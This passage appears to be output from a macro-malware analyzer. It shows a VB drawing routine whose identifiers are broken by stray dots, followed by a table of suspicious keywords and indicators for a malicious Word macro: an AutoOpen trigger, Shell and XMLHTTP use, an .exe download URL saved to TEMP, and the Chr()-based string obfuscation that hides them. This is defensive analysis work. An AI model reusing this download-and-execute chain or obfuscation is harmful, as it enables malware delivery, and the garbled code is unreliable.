  511.             Case 1
  512.                 Cal.L Grid.Blt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 0, 0, 4, 18, 2, 1, 1, 1)
  513.                
  514.             Case 2
  515.                 Cal.L Gri.dBlt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 4, 0, 4, 18, 2, 1, 1, 1)
  516.                                    
  517.     End Select
  518.     If IsWin.dowEnabled(hWnd) Then
  519.         Cal.L Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 0)
  520.     Else
  521.         Ca.ll Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 4)
  522.     End If
  523.     If hDC = 0 Then
  524.         m_hDC = Ge.tWindowDC(hWnd)
  525.     Else
  526.         m_hDC = hDC
  527.     End If
  528.     Bit.Blt m_hDC, m_wRect.Width - m_BtSize - 1, 1, m_BtSize, m_wRect.Height - 2, TmpDC, 0, 0, vbSrcCopy
  529.     De.leteDC TmpDC
  530.     Del.eteObject TmpBMP
  531.     If hDC = 0 Then Ca.ll Re.leaseDC(hWnd, m_hDC)
  532. End Function
  533.  
  534. +------------+----------------------+-----------------------------------------+
  535. | Type       | Keyword              | Description                             |
  536. +------------+----------------------+-----------------------------------------+
  537. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  538. | Suspicious | Open                 | May open a file                         |
  539. | Suspicious | Shell                | May run an executable file or a system  |
  540. |            |                      | command                                 |
  541. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  542. |            |                      | command                                 |
  543. | Suspicious | Shell.Application    | May run an application (if combined     |
  544. |            |                      | with CreateObject)                      |
  545. | Suspicious | CreateObject         | May create an OLE object                |
  546. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  547. |            |                      | strings                                 |
  548. | Suspicious | ADODB.Stream         | May create a text file                  |
  549. | Suspicious | SaveToFile           | May create a text file                  |
  550. | Suspicious | Write                | May write to a file (if combined with   |
  551. |            |                      | Open)                                   |
  552. | Suspicious | Put                  | May write to a file (if combined with   |
  553. |            |                      | Open)                                   |
  554. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  555. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  556. |            |                      | be used to obfuscate strings (option    |
  557. |            |                      | --decode to see all)                    |
  558. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  559. |            |                      | may be used to obfuscate strings        |
  560. |            |                      | (option --decode to see all)            |
  561. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  562. |            | Strings              | may be used to obfuscate strings        |
  563. |            |                      | (option --decode to see all)            |
  564. | IOC        | http://archives.wnpv | URL (obfuscation: VBA expression)       |
  565. |            | am.com/bvcb34d/983bv |                                         |
  566. |            | 3.exe                |                                         |
  567. | IOC        | fDe12.exe            | Executable file name (obfuscation: VBA  |
  568. |            |                      | expression)                             |
  569. | IOC        | 983bv3.exe           | Executable file name (obfuscation: VBA  |
  570. |            |                      | expression)                             |
  571. | VBA string | TEMP                 | ("T" + Chr(69) + "MP")                  |
  572. | VBA string | \fDe12.exe           | "\f" + Chr(68) + "e12.ex" & Chr(101)    |
  573. | VBA string | GET                  | "G" + Chr(69) + "T"                     |
  574. | VBA string | http://archives.wnpv | Chr(104) & Chr(116) & Chr(116) & "p" &  |
  575. |            | am.com/bvcb34d/983bv | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
  576. |            | 3.exe                | Chr(114) & "c" & "h" & Chr(105) & "v" & |
  577. |            |                      | Chr(101) & Chr(115) & "." & Chr(119) &  |
  578. |            |                      | Chr(110) & "p" & Chr(118) & Chr(97) &   |
  579. |            |                      | Chr(109) & Chr(46) & Chr(99) & Chr(111) |
  580. |            |                      | & Chr(109) & Chr(47) & "b" & Chr(118) & |
  581. |            |                      | Chr(99) & Chr(98) & Chr(51) & "4" &     |
  582. |            |                      | Chr(100) & Chr(47) & Chr(57) & "8" &    |
  583. |            |                      | Chr(51) & Chr(98) & "v" & Chr(51) &     |
  584. |            |                      | Chr(46) & Chr(101) & Chr(120) & "e"     |
  585. +------------+----------------------+-----------------------------------------+